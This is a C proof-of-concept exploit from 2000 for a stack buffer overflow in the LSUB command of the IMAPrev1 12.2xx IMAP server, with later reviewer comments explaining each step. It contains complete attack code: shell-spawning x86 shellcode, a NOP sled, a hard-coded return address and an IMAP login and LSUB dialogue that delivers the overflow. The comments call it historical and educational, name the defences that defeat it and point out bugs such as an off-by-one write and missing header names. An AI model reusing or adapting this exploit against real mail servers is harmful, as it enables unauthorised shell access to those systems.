/* IMAPrev1 12.2xx exploit ( lsub bug ) * del0rean@s0ftpj.org * just for the gang ! */
/* v 12.250 - slackware 4.0 esp = 0xbffff890 offset = 1000 */
/* please add! */

/*
 * Historical (2000) proof-of-concept for a stack-based buffer overflow in the
 * LSUB command handler of IMAPrev1 12.2xx.  The program writes an IMAP dialogue
 * to stdout: a LOGIN line, then an LSUB command announcing a 1064-byte literal,
 * then the literal itself, built so that the server-side copy into a fixed-size
 * stack buffer overwrites the saved return address with a guessed stack address.
 *
 * It is a single-target, hard-coded-address exploit.  Each of the defences that
 * later became standard -- bounds-checking the announced literal size before
 * copying, stack canaries, a non-executable stack, ASLR -- defeats it on its own.
 * Kept as an educational artefact of the bug class, not as usable tooling.
 *
 * NOTE(review): the header names after the two #include directives were lost in
 * extraction.  The code calls printf/putchar, exit/atoi and memset/memcpy/strlen,
 * so the originals were presumably <stdio.h>, <stdlib.h> and <string.h>.
 */
#include #include

/* Size of buf and of the LSUB literal; must agree with the "{1064}" printed below. */
#define LENGTH 1064

/* Payload placed inside the NOP sled.  67 bytes, none of them NUL.  Appears to be a
 * Linux/x86 execve("/bin/sh") payload whose trailing string bytes are stored with
 * 0x30 subtracted and patched back at run time by the leading "add byte [esi+N],0x30"
 * instructions (presumably to avoid characters the server would reject).  Not
 * verified here; treat the description as a reading of the bytes, not a guarantee. */
char shellcode[] = /* dunno where i grabbed thiz :) */
    "\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\x46\x03\x30"
    "\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\x08\x31\xc0"
    "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56"
    "\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff"
    "\x2f\x32\x39\x3e\x2f\x43\x38";

/* Print usage to stdout and exit with status 0.  Called when fewer than two
 * positional arguments are supplied. */
void usage()
{
    printf("IMAPrev1 v 12.2xx exploit\n");
    printf("Usage : ./explo user pass \n");
    exit(0);
}

/*
 * Build the overflow literal and emit the IMAP dialogue on stdout.
 *
 * argv[1], argv[2]   login credentials, interpolated verbatim into the LOGIN command
 * argv[3] (optional) decimal value subtracted from the hard-coded stack address
 *
 * `void main` is not standard C; a hosted implementation expects `int main`.
 */
void main( int argc, char *argv[] )
{
    int i, offset = 0;
    char buf[LENGTH];
    /* Guessed stack pointer for one specific target build.  The whole technique rests
     * on the stack living at a fixed, predictable address; ASLR alone breaks it. */
    unsigned long esp = 0xbffff890; /* 12.250 - slackware 4.0 */

    if(argc < 3) usage();
    /* atoi() performs no validation: a non-numeric argv[3] silently becomes 0 and an
     * out-of-range value is undefined behaviour. */
    if(argc == 4) offset = atoi(argv[3]);
    // fprintf(stderr,"0x%x\n", ge() );   /* leftover debug call; ge() is not defined in this file */

    /* Bytes 0..1031 become 0x90 (NOP).  The loop below then overwrites everything
     * from the end of the shellcode onwards, so the effective sled is bytes 0..612. */
    memset(buf, 0x90, 1032);
    /* Shellcode occupies bytes 613..679. */
    memcpy(buf+613, shellcode, strlen(shellcode));
    /* From byte 680 to the end, repeat the guessed return address every 4 bytes.
     * BUG: the bound is `i <= LENGTH`, so the last iteration (i == 1064) stores 4 bytes
     * past the end of buf -- a stack out-of-bounds write in this program itself;
     * `i + 4 <= LENGTH` would be the correct bound.  The `long *` store also assumes a
     * 4-byte long and ignores alignment and strict-aliasing rules (i is a multiple of
     * 4 starting from 680, but buf's own alignment is not guaranteed). */
    for(i = strlen(shellcode)+613; i <= LENGTH; i+=4)
        *(long *)&buf[i] = (unsigned long) esp - offset;

    /* Credentials are printed unescaped; an IMAP-special character in either argument
     * changes the meaning of the LOGIN line. */
    printf("1 LOGIN %s %s\n", argv[1], argv[2]);
    /* IMAP literal syntax: {n} announces that exactly n bytes follow; n must be LENGTH. */
    printf("1 LSUB \"\" {1064}\r\n");
    /* Emitted byte by byte rather than via printf("%s") because the literal may contain
     * NUL bytes (the low byte of esp - offset can be zero for some offsets). */
    for(i = 0; i < LENGTH; i++)
        putchar(buf[i]);
    printf("\r\n");
}
/* www.hack.co.za [25 September 2000]*/